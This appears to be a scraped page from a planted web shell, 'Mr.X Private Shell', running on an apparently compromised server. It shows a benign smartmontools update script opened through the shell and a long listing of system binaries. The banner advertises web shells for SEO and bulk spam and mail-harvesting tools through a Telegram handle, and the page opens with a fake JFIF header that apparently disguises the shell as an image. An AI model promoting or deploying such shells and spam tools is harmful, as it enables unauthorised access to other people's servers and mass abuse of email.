xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#! /bin/sh
#
# smartmontools drive database update script
#
# Home page of code is: http://www.smartmontools.org
#
# Copyright (C) 2010-17 Christian Franke
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# You should have received a copy of the GNU General Public License
# (for example COPYING); If not, see <http://www.gnu.org/licenses/>.
#
# $Id: update-smart-drivedb.in 4584 2017-11-03 22:43:32Z chrfranke $
#

set -e

# Set by config.status
export PATH="/usr/bin:/bin"
PACKAGE="smartmontools"
VERSION="6.6"
prefix="/usr"
exec_prefix="/usr"
sbindir="/usr/sbin"
datarootdir="${prefix}/share"
datadir="/usr/share"
drivedbdir="${datadir}/${PACKAGE}"

# Download tools
os_dltools="curl wget lynx svn"

# drivedb.h update branch
BRANCH="RELEASE_6_6_DRIVEDB"

# Default drivedb location
DRIVEDB="$drivedbdir/drivedb.h"

# GnuPG used to verify signature (disabled if empty)
GPG="gpg"

# Smartctl used for syntax check
SMARTCTL="$sbindir/smartctl"

myname=$0

usage()
{
  cat <<EOF
smartmontools $VERSION drive database update script

Usage: $myname [OPTIONS] [DESTFILE]

  -s SMARTCTL     Use SMARTCTL for syntax check ('-s -' to disable)
                  [default: $SMARTCTL]
  -t TOOL         Use TOOL for download: $os_dltools
                  [default: first one found in PATH]
  -u LOCATION     Use URL of LOCATION for download:
                    sf (Sourceforge code browser via HTTPS)
                    svn (SVN repository via HTTPS) [default]
                    svni (SVN repository via HTTP)
                    trac (Trac code browser via HTTPS)
  --trunk         Download from SVN trunk (may require '--no-verify')
  --cacert FILE   Use CA certificates from FILE to verify the peer
  --capath DIR    Use CA certificate files from DIR to verify the peer
  --insecure      Don't abort download if certificate verification fails
  --no-verify     Don't verify signature
  --export-key    Print the OpenPGP/GPG public key block
  --dryrun        Print download commands only
  -v              Verbose output

Updates $DRIVEDB
or DESTFILE from branches/$BRANCH of smartmontools
SVN repository.
EOF
  exit 1
}

error()
{
  echo "$myname: $*" >&2
  exit 1
}

warning()
{
  echo "$myname: (Warning) $*" >&2
}

selecturl()
{
  case $1 in
    sf)   url='https://sourceforge.net/p/smartmontools/code/HEAD/tree/trunk/smartmontools/drivedb.h?format=raw' ;;
    svn)  url='https://svn.code.sf.net/p/smartmontools/code/trunk/smartmontools/drivedb.h' ;;
    svni) url='http://svn.code.sf.net/p/smartmontools/code/trunk/smartmontools/drivedb.h' ;;
    trac) url='https://www.smartmontools.org/export/HEAD/trunk/smartmontools/drivedb.h' ;;
    *) usage ;;
  esac
}

inpath()
{
  local d rc save
  rc=1
  save=$IFS
  IFS=':'
  for d in $PATH; do
    test -f "$d/$1" || continue
    test -x "$d/$1" || continue
    rc=0
    break
  done
  IFS=$save
  return $rc
}

vecho()
{
  test -n "$q" || echo "$*"
}

# vrun COMMAND ARGS...
vrun()
{
  if [ -n "$dryrun" ]; then
    echo "$*"
  elif [ -n "$q" ]; then
    "$@" 2>/dev/null
  else
    echo "$*"
    "$@"
  fi
}

# vrun2 OUTFILE COMMAND ARGS...
vrun2()
{
  local f err rc
  f=$1; shift
  rc=0
  if [ -n "$dryrun" ]; then
    echo "$* > $f"
  else
    vecho "$* > $f"
    err=`"$@" 2>&1 > $f` || rc=$?
    if [ -n "$err" ]; then
      vecho "$err" >&2
      test $rc != 0 || rc=42
    fi
  fi
  return $rc
}

# download URL FILE
download()
{
  local f u rc
  u=$1; f=$2
  rc=0

  case $tool in
    curl)
      vrun curl ${q:+-s} -f --max-redirs 0 \
        ${cacert:+--cacert "$cacert"} \
        ${capath:+--capath "$capath"} \
        ${insecure:+--insecure} \
        -o "$f" "$u" || rc=$?
      ;;

    wget)
      vrun wget $q --max-redirect=0 \
        ${cacert:+--ca-certificate="$cacert"} \
        ${capath:+--ca-directory="$capath"} \
        ${insecure:+--no-check-certificate} \
        -O "$f" "$u" || rc=$?
      ;;

    lynx)
      test -z "$cacert" || vrun export SSL_CERT_FILE="$cacert"
      test -z "$capath" || vrun export SSL_CERT_DIR="$capath"
      # Check also stderr as lynx does not return != 0 on HTTP error
      vrun2 "$f" lynx -stderr -noredir -source "$u" || rc=$?
      ;;

    svn)
      vrun svn $q export \
        --non-interactive --no-auth-cache \
        ${cacert:+--config-option "servers:global:ssl-trust-default-ca=no"} \
        ${cacert:+--config-option "servers:global:ssl-authority-files=$cacert"} \
        ${insecure:+--trust-server-cert} \
        "$u" "$f" || rc=$?
      ;;

    fetch) # FreeBSD
      vrun fetch $q --no-redirect \
        ${cacert:+--ca-cert "$cacert"} \
        ${capath:+--ca-path "$capath"} \
        ${insecure:+--no-verify-hostname} \
        -o "$f" "$u" || rc=$?
      ;;

    ftp) # OpenBSD
      vrun ftp \
        ${cacert:+-S cafile="$cacert"} \
        ${capath:+-S capath="$capath"} \
        ${insecure:+-S dont} \
        -o "$f" "$u" || rc=$?
      ;;

    *) error "$tool: unknown (internal error)" ;;
  esac
  return $rc
}

# check_file FILE FIRST_CHAR MIN_SIZE MAX_SIZE
check_file()
{
  local firstchar f maxsize minsize size
  test -z "$dryrun" || return 0
  f=$1; firstchar=$2; minsize=$3; maxsize=$4

  # Check first chars
  case `dd if="$f" bs=1 count=1 2>/dev/null` in
    $firstchar) ;;
    \<) echo "HTML error message"; return 1 ;;
    *)   echo "unknown file contents"; return 1 ;;
  esac

  # Check file size
  size=`wc -c < "$f"`
  if test "$size" -lt $minsize; then
    echo "too small file size $size bytes"
    return 1
  fi
  if test "$size" -gt $maxsize; then
    echo "too large file size $size bytes"
    return 1
  fi
  return 0
}

# unexpand_svn_id < INFILE > OUTFILE
unexpand_svn_id()
{
  sed 's,\$''Id'': drivedb\.h [0-9][0-9]* 2[-0-9]* [012][:0-9]*Z [a-z][a-z]* \$,$''Id''$,'
}

# Smartmontools Signing Key (through 2018)
# <smartmontools-database@listi.jpberlin.de>
# Key ID DFD22559
public_key="\
-----BEGIN PGP PUBLIC KEY BLOCK-----

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
=CNK4
-----END PGP PUBLIC KEY BLOCK-----
"

# gpg_verify FILE.asc FILE
gpg_verify()
{
  local gnupgtmp opts out rc
  opts="--quiet ${q:+--no-secmem-warnin} --batch --no-tty"

  # Create temp home dir
  gnupgtmp="$tmpdir/.gnupg.$$.tmp"
  rm -f -r "$gnupgtmp"
  mkdir "$gnupgtmp" || exit 1
  chmod 0700 "$gnupgtmp"

  # Import public key
  "$GPG" $opts --homedir="$gnupgtmp" --import <<EOF
$public_key
EOF
  test $? = 0 || exit 1

  # Verify
  rc=0
  out=`"$GPG" $opts --homedir="$gnupgtmp" --verify "$1" "$2" </dev/null 2>&1` || rc=1
  vecho "$out"

  rm -f -r "$gnupgtmp"
  return $rc
}

# mv_all PREFIX OLD NEW
mv_all()
{
  mv "${1}${2}"         "${1}${3}"
  mv "${1}${2}.raw"     "${1}${3}.raw"
  mv "${1}${2}.raw.asc" "${1}${3}.raw.asc"
}

# Parse options
smtctl=$SMARTCTL
tool=
url=
q="-q"
dryrun=
trunk=
cacert=
capath=
insecure=
no_verify=

while true; do case $1 in
  -s)
    shift; test -n "$1" || usage
    smtctl=$1 ;;

  -t)
    shift
    case $1 in *\ *) usage ;; esac
    case " $os_dltools " in *\ $1\ *) ;; *) usage ;; esac
    tool=$1 ;;

  -u)
    shift; selecturl "$1" ;;

  -v)
    q= ;;

  --dryrun)
    dryrun=t ;;

  --trunk)
    trunk=trunk ;;

  --cacert)
    shift; test -n "$1" || usage
    cacert=$1 ;;

  --capath)
    shift; test -n "$1" || usage
    capath=$1 ;;

  --insecure)
    insecure=t ;;

  --no-verify)
    no_verify=t ;;

  --export-key)
    cat <<EOF
$public_key
EOF
    exit 0 ;;

  -*)
    usage ;;

  *)
    break ;;
esac; shift; done

case $# in
  0) DEST=$DRIVEDB ;;
  1) DEST=$1 ;;
  *) usage ;;
esac

if [ -z "$tool" ]; then
  # Find download tool in PATH
  for t in $os_dltools; do
    if inpath "$t"; then
      tool=$t
      break
    fi
  done
  test -n "$tool" || error "found none of: $os_dltools"
fi

test -n "$url" || selecturl "svn"

# Check option compatibility
case "$tool:$url" in
  svn:http*://svn.code.sf.net*) ;;
  svn:*) error "'-t svn' requires '-u svn' or '-u svni'" ;;
esac
case "$tool:${capath:+set}" in
  svn:set) warning "'--capath' is ignored if '-t svn' is used" ;;
esac
case "${insecure:-f}:$url" in
  t:http:*) insecure= ;;
  ?:https:*) ;;
  *) error "'-u svni' requires '--insecure'" ;;
esac
case "$tool:$insecure" in
  lynx:t) warning "'--insecure' is ignored if '-t lynx' is used" ;;
esac

# Check for smartctl
if [ "$smtctl" != "-" ]; then
  "$smtctl" -V >/dev/null 2>&1 \
  || error "$smtctl: not found ('-s -' to ignore)"
fi

# Check for GnuPG
if [ -z "$no_verify" ]; then
  test -n "$GPG" \
  || error "GnuPG is not available ('--no-verify' to ignore)"
  "$GPG" --version >/dev/null 2>&1 \
  || error "$GPG: not found ('--no-verify' to ignore)"
fi

# Use destination directory as temp directory for gpg
tmpdir=`dirname "$DEST"`

# Adjust URLs
src=`echo "$url" | sed "s,/trunk/,/branches/$BRANCH/,"`
src_asc=`echo "$src" | sed "s,/drivedb\.h,/drivedb.h.raw.asc,"`
test -z "$trunk" || src=$url

# Download
test -n "$dryrun" || rm -f "$DEST.new" "$DEST.new.raw" "$DEST.new.raw.asc"

vecho "Download ${trunk:-branches/$BRANCH}/drivedb.h with $tool"
rc=0
download "$src" "$DEST.new" || rc=$?
if [ $rc != 0 ]; then
  rm -f "$DEST.new"
  error "${trunk:-$BRANCH}/drivedb.h: download failed ($tool: exit $rc)"
fi
if ! errmsg=`check_file "$DEST.new" '/' 10000 1000000`; then
  mv "$DEST.new" "$DEST.error"
  error "$DEST.error: $errmsg"
fi

vecho "Download branches/$BRANCH/drivedb.h.raw.asc with $tool"
rc=0
download "$src_asc" "$DEST.new.raw.asc" || rc=$?
if [ $rc != 0 ]; then
  rm -f "$DEST.new" "$DEST.new.raw.asc"
  error "$BRANCH/drivedb.h.raw.asc: download failed ($tool: exit $rc)"
fi
if ! errmsg=`check_file "$DEST.new.raw.asc" '-' 200 2000`; then
  rm -f "$DEST.new"
  mv "$DEST.new.raw.asc" "$DEST.error.raw.asc"
  error "$DEST.error.raw.asc: $errmsg"
fi

test -z "$dryrun" || exit 0

# Create raw file with unexpanded SVN Id
# (This assumes newlines are LF and not CR/LF)
unexpand_svn_id < "$DEST.new" > "$DEST.new.raw"

# Adjust timestamps and permissions
touch "$DEST.new" "$DEST.new.raw" "$DEST.new.raw.asc"
chmod 0644 "$DEST.new" "$DEST.new.raw" "$DEST.new.raw.asc"

if [ -z "$no_verify" ]; then
  # Verify raw file
  if ! gpg_verify "$DEST.new.raw.asc" "$DEST.new.raw"; then
    mv_all "$DEST" ".new" ".error"
    test -n "$trunk" || error "$DEST.error.raw: *** BAD signature ***"
    error "$DEST.error.raw: signature from branch no longer valid ('--no-verify' to ignore)"
  fi
fi

if [ "$smtctl" != "-" ]; then
  # Check syntax
  if ! "$smtctl" -B "$DEST.new" -P showall >/dev/null; then
    mv_all "$DEST" ".new" ".error"
    error "$DEST.error: rejected by $smtctl, probably no longer compatible"
  fi
  vecho "$smtctl: syntax OK"
fi

# Keep old file if identical, ignore missing Id keyword expansion in new file
rm -f "$DEST.lastcheck"
if [ -f "$DEST" ]; then
  if [ -f "$DEST.raw" ] && [ -f "$DEST.raw.asc" ]; then
    if    cmp "$DEST.raw"     "$DEST.new.raw"     >/dev/null 2>&1 \
       && cmp "$DEST.raw.asc" "$DEST.new.raw.asc" >/dev/null 2>&1 \
       && {   cmp "$DEST"     "$DEST.new" >/dev/null 2>&1 \
           || cmp "$DEST.raw" "$DEST.new" >/dev/null 2>&1; }
    then
      rm -f "$DEST.new" "$DEST.new.raw" "$DEST.new.raw.asc"
      touch "$DEST.lastcheck"
      echo "$DEST is already up to date"
      exit 0
    fi
    mv_all "$DEST" "" ".old"
  else
    mv "$DEST" "$DEST.old"
  fi
fi

mv_all "$DEST" ".new" ""

echo "$DEST updated from ${trunk:-branches/$BRANCH}${no_verify:+ (NOT VERIFIED)}"

Filemanager

Name Type Size Permission Actions
Check File 190 B 0755
OCICLI File 441 B 0755
OneClickInstallCLI File 441 B 0755
OneClickInstallUI File 99 B 0755
OneClickInstallUrlHandler File 99 B 0755
SUSEConnect File 637 B 0755
SUSEfirewall2 File 84.6 KB 0755
SuSEfirewall2 File 84.6 KB 0755
accept File 10.1 KB 0555
accessdb File 10.63 KB 0755
addgnupghome File 3.05 KB 0755
addpart File 22.1 KB 0755
adjtimex File 43.52 KB 0755
agetty File 58.19 KB 0755
alternatives File 42.66 KB 0755
applySystemQuotas.pl File 3.15 KB 0755
applygnupgdefaults File 2.21 KB 0755
arpd File 50.96 KB 0755
arping File 22.04 KB 0755
atd File 26.84 KB 0755
atmel_fwl File 1.67 KB 0755
atrun File 67 B 0755
audispd File 38.18 KB 0750
auditctl File 42.23 KB 0750
auditd File 110.24 KB 0750
augenrules File 3.7 KB 0750
aureport File 98.16 KB 0755
ausearch File 106.17 KB 0755
automount File 297.86 KB 0755
autrace File 14.09 KB 0750
avcstat File 10.4 KB 0755
badblocks File 26.66 KB 0755
biosdecode File 19.02 KB 0755
blkdiscard File 26.1 KB 0755
blkid File 102.2 KB 0755
blkmapd File 26.66 KB 0755
blkzone File 62.17 KB 0755
blockdev File 54.17 KB 0755
bmc-snmp-proxy File 9.91 KB 0755
bridge File 75.07 KB 0755
btrfs File 633.27 KB 0755
btrfs-convert File 352.66 KB 0755
btrfs-debug-tree File 316.2 KB 0755
btrfs-image File 340.34 KB 0755
btrfs-show-super File 316.41 KB 0755
btrfs-zero-log File 312.16 KB 0755
btrfsck File 633.27 KB 0755
btrfstune File 316.16 KB 0755
cache_check File 1.2 MB 0755
cache_dump File 1.2 MB 0755
cache_metadata_size File 1.2 MB 0755
cache_repair File 1.2 MB 0755
cache_restore File 1.2 MB 0755
cache_writeback File 1.2 MB 0755
calc_tickadj File 2.78 KB 0755
cfdisk File 90.53 KB 0755
cgdisk File 167.09 KB 0755
chat File 26.55 KB 0755
chcpu File 38.09 KB 0755
check_mail_queue File 477 B 0755
chpasswd File 54.94 KB 0755
cifs.idmap File 14.17 KB 0755
cifs.upcall File 34.36 KB 0755
clockdiff File 18.24 KB 0755
config.postfix File 43.68 KB 0755
convertquota File 75.8 KB 0755
cracklib-check File 6.26 KB 0755
cracklib-format File 218 B 0755
cracklib-packer File 10.28 KB 0755
cracklib-unpacker File 6.24 KB 0755
crda File 18.52 KB 0755
create-cracklib-dict File 990 B 0755
cron File 74.82 KB 0755
cryptconfig File 63.26 KB 0755
cryptsetup File 91.71 KB 0755
cryptsetup-reencrypt File 90.3 KB 0755
ctrlaltdel File 34.1 KB 0755
ctstat File 18.87 KB 0755
cupsaccept File 10.1 KB 0555
cupsdisable File 10.1 KB 0555
cupsenable File 10.1 KB 0555
cupsreject File 10.1 KB 0555
ddns-confgen File 18.5 KB 0755
debugfs File 187.7 KB 0755
delpart File 22.1 KB 0755
depmod File 236.71 KB 0755
devlink File 50.7 KB 0755
dmidecode File 82.45 KB 0755
dnssec-checkds File 922 B 0755
dnssec-coverage File 924 B 0755
dnssec-dsfromkey File 55.32 KB 0755
dnssec-importkey File 55.32 KB 0755
dnssec-keyfromlabel File 59.27 KB 0755
dnssec-keygen File 67.27 KB 0755
dnssec-keymgr File 920 B 0755
dnssec-revoke File 51.21 KB 0755
dnssec-settime File 59.26 KB 0755
dnssec-signzone File 108.13 KB 0755
dnssec-verify File 51.2 KB 0755
dosfsck File 54.58 KB 0755
dosfslabel File 50.57 KB 0755
dumpe2fs File 26.89 KB 0755
e2freefrag File 10.39 KB 0755
e2fsck File 289.48 KB 0755
e2image File 30.98 KB 0755
e2label File 99.89 KB 0755
e2undo File 18.55 KB 0755
e4crypt File 22.56 KB 0755
e4defrag File 26.59 KB 0755
edquota File 84.2 KB 0755
edquota_editor File 1.21 KB 0755
efibootdump File 18.56 KB 0755
efibootmgr File 43.89 KB 0755
era_check File 1.2 MB 0755
era_dump File 1.2 MB 0755
era_invalidate File 1.2 MB 0755
era_restore File 1.2 MB 0755
ethtool File 291.43 KB 0755
eventlogadm File 38.1 KB 0755
exchange-bmc-os-info File 7.75 KB 0755
exportfs File 63.13 KB 0755
fatlabel File 50.57 KB 0755
fatresize File 10.37 KB 0755
fbtest File 10.4 KB 0755
fdformat File 26.1 KB 0755
fdisk File 134.22 KB 0755
filefrag File 14.38 KB 0755
findfs File 10.09 KB 0755
fixmbr File 10.25 KB 0755
flushb File 43 B 0755
fping File 30.63 KB 0755
fping6 File 30.64 KB 0755
fsck File 46.14 KB 0755
fsck.btrfs File 1.16 KB 0755
fsck.cramfs File 34.13 KB 0755
fsck.ext2 File 289.48 KB 0755
fsck.ext3 File 289.48 KB 0755
fsck.ext4 File 289.48 KB 0755
fsck.fat File 54.58 KB 0755
fsck.minix File 106.2 KB 0755
fsck.msdos File 54.58 KB 0755
fsck.vfat File 54.58 KB 0755
fsfreeze File 10.09 KB 0755
fstrim File 58.17 KB 0755
gdisk File 174.88 KB 0755
genhomedircon File 23.37 KB 0755
genl File 54.91 KB 0755
genrandom File 10.33 KB 0755
getenforce File 6.23 KB 0755
getsebool File 10.32 KB 0755
getsysinfo File 1.66 KB 0755
glibc_post_upgrade File 732.43 KB 0700
gpm File 96.21 KB 0755
groupadd File 53.81 KB 0755
groupdel File 49.6 KB 0755
groupmod File 60.13 KB 0755
growpart File 21.3 KB 0755
grpck File 45.66 KB 0755
grub2-bios-setup File 1.03 MB 0755
grub2-check-default File 2.38 KB 0755
grub2-install File 1.29 MB 0755
grub2-macbless File 1.01 MB 0755
grub2-mkconfig File 8.48 KB 0755
grub2-ofpathname File 228.11 KB 0755
grub2-once File 6.98 KB 0755
grub2-probe File 1.02 MB 0755
grub2-reboot File 4.01 KB 0755
grub2-set-default File 3.47 KB 0755
grub2-sparc64-setup File 1.03 MB 0755
hardlink File 14.34 KB 0755
haveged File 18.64 KB 0755
hdparm File 100.74 KB 0755
hwclock File 86.3 KB 0755
hwinfo File 33.91 KB 0755
icmpinfo File 14.76 KB 0755
iconvconfig File 30.7 KB 0755
ifdhandler File 200.66 KB 0755
ifdproxy File 200.47 KB 0755
ifenslave File 18.8 KB 0755
ifrename File 30.55 KB 0755
ifstat File 42.91 KB 0755
iftop File 59.66 KB 0755
ifup File 5.82 KB 0755
in.rdisc File 22.13 KB 0755
inputattach File 16.52 KB 0755
insmod File 236.71 KB 0755
insserv File 6.06 KB 0755
install_acx100_firmware File 1.4 KB 0755
install_intersil_firmware File 1.3 KB 0755
integritysetup File 44.65 KB 0755
iotop File 495 B 0755
ip File 498 KB 0755
ip6tables File 85.81 KB 0755
ip6tables-batch File 44.09 KB 0755
ip6tables-restore File 85.81 KB 0755
ip6tables-save File 85.81 KB 0755
ipmievd File 408.33 KB 0755
iptables File 85.81 KB 0755
iptables-apply File 3.38 KB 0755
iptables-batch File 44.09 KB 0755
iptables-restore File 85.81 KB 0755
iptables-save File 85.81 KB 0755
irqbalance File 50.75 KB 0755
isc-hmac-fixup File 10.4 KB 0755
itox File 26.46 KB 0755
iwconfig File 26.48 KB 0755
iwevent File 18.48 KB 0755
iwgetid File 14.29 KB 0755
iwlist File 34.63 KB 0755
iwpriv File 14.37 KB 0755
iwspy File 14.32 KB 0755
kbdsettings File 1.17 KB 0755
kdump File 10.32 KB 0755
kdumptool File 520.46 KB 0755
kexec File 255.5 KB 0755
kexec-bootloader File 6.2 KB 0755
klogconsole File 6.28 KB 0744
ldattach File 30.1 KB 0755
lnstat File 18.87 KB 0755
load_policy File 10.3 KB 0755
lockdev File 10.23 KB 2755
logrotate File 71.23 KB 0755
logsave File 10.41 KB 0755
logwatch File 57.61 KB 0755
losetup File 98.76 KB 0755
lpadmin File 26.09 KB 0555
lpc File 14.15 KB 0555
lpinfo File 10.09 KB 0555
lpmove File 10.09 KB 0555
lsmod File 236.71 KB 0755
lsmsr File 121.91 KB 0755
lvm File 2.07 MB 0555
lvmconf File 12.55 KB 0555
lwepgen File 10.2 KB 0755
matchpathcon File 10.36 KB 0755
mcelog File 143.45 KB 0755
mk_isdnhwdb File 34.54 KB 0755
mkdict File 218 B 0755
mkdosfs File 27.06 KB 0755
mkdumprd File 7.13 KB 0755
mke2fs File 120.23 KB 0755
mkfs File 10.09 KB 0755
mkfs.bfs File 26.1 KB 0755
mkfs.btrfs File 332.27 KB 0755
mkfs.cramfs File 34.11 KB 0755
mkfs.ext2 File 120.23 KB 0755
mkfs.ext3 File 120.23 KB 0755
mkfs.ext4 File 120.23 KB 0755
mkfs.fat File 27.06 KB 0755
mkfs.minix File 94.19 KB 0755
mkfs.msdos File 27.06 KB 0755
mkfs.vfat File 27.06 KB 0755
mklost+found File 10.32 KB 0755
mkpostfixcert File 5.85 KB 0755
mksubvolume File 67.23 KB 0755
mkswap File 94.18 KB 0755
modinfo File 236.71 KB 0755
modprobe File 236.71 KB 0755
mount.crypt File 34.98 KB 0755
mount.fuse File 10.32 KB 0755
mount.vmhgfs File 42.82 KB 0755
mountstats File 23.88 KB 0755
mountstats_0_3 File 35.15 KB 0755
mysqld File 18.61 MB 0755
named-journalprint File 10.32 KB 0755
netscsid File 107.96 KB 0555
newusers File 74.25 KB 0755
nfnl_osf File 14.4 KB 0755
nfsidmap File 18.65 KB 0755
nfsiostat File 23.55 KB 0755
nfsstat File 29.07 KB 0755
nginx File 7.94 MB 0755
nologin File 10.09 KB 0755
nscd File 152.22 KB 0755
nsec3hash File 10.31 KB 0755
nstat File 22.7 KB 0755
ntp-keygen File 159.73 KB 0755
ntp-wait File 3.12 KB 0755
ntpd File 855.16 KB 0755
ntpdate File 79.23 KB 0755
ntpdc File 228.16 KB 0755
ntpq File 270.23 KB 0755
ntptime File 18.22 KB 0755
ntptrace File 3.48 KB 0755
one-context-run File 1.77 KB 0755
one-contextd File 9.12 KB 0755
open_init_pty File 10.36 KB 0755
openct-control File 192.26 KB 0755
ownership File 10.37 KB 0755
packer File 10.28 KB 0755
pam-config File 199.05 KB 0755
parted File 75.5 KB 0755
partprobe File 10.37 KB 0755
partx File 98.5 KB 0755
pcscd File 115.78 KB 0755
pdata_tools File 1.2 MB 0755
pivot_root File 10.1 KB 0755
pluginviewer File 14.55 KB 0755
plymouth-set-default-theme File 6.21 KB 0755
plymouthd File 83.75 KB 0755
pmt-ehd File 26.88 KB 0755
pmvarrun File 14.47 KB 0755
postalias File 18.64 KB 0755
postcat File 18.61 KB 0755
postconf File 176.46 KB 0755
postdrop File 14.73 KB 2755
postfix File 14.5 KB 0755
postkick File 10.36 KB 0755
postlock File 10.41 KB 0755
postlog File 10.57 KB 0755
postmap File 18.6 KB 0755
postmulti File 27.05 KB 0755
postqueue File 22.75 KB 2755
postsuper File 23.02 KB 0755
pppd File 354.42 KB 0755
pppdump File 47.59 KB 0755
pppoe-discovery File 18.51 KB 0555
pppstats File 14.38 KB 0755
pptp File 59.59 KB 0755
pptp-command File 22.74 KB 0755
pptpsetup File 6.84 KB 0755
pwck File 50.81 KB 0755
pwconv File 46.66 KB 0755
pwunconv File 37.28 KB 0755
qmqp-source File 18.65 KB 0755
quota_nld File 79.86 KB 0755
quotacheck File 108.52 KB 0755
quotaoff File 79.98 KB 0755
quotaon File 79.98 KB 0755
quotastats File 14.45 KB 0755
raw File 14.09 KB 0755
rcSuSEfirewall2 File 5.28 KB 0755
rcatd File 5.28 KB 0755
rcauditd File 5.28 KB 0755
rcautofs File 5.28 KB 0755
rcbmc-snmp-proxy File 5.28 KB 0755
rcbtrfsmaintenance-refresh File 5.28 KB 0755
rccron File 5.28 KB 0755
rcexchange-bmc-os-info File 5.28 KB 0755
